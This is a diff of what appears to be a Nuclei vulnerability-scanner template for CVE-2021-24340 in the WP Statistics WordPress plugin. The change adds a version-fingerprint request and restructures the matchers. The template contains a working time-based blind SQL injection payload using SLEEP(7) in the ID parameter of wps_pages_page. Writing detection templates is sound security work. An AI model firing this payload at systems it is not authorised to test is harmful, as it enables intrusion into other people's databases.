Update CVE-2021-24340.yaml
parent
1109267734
commit
31142ad048
|
@ -24,15 +24,26 @@ info:
|
|||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 15s
|
||||
GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=7'
|
||||
- 'status_code == 500'
|
||||
- 'contains(body, ">WordPress › Error<") && contains(body, ">Your request is not valid.<")'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(body_1, "WP Statistics")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_2>=7'
|
||||
- 'status_code_2 == 500'
|
||||
- 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")'
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue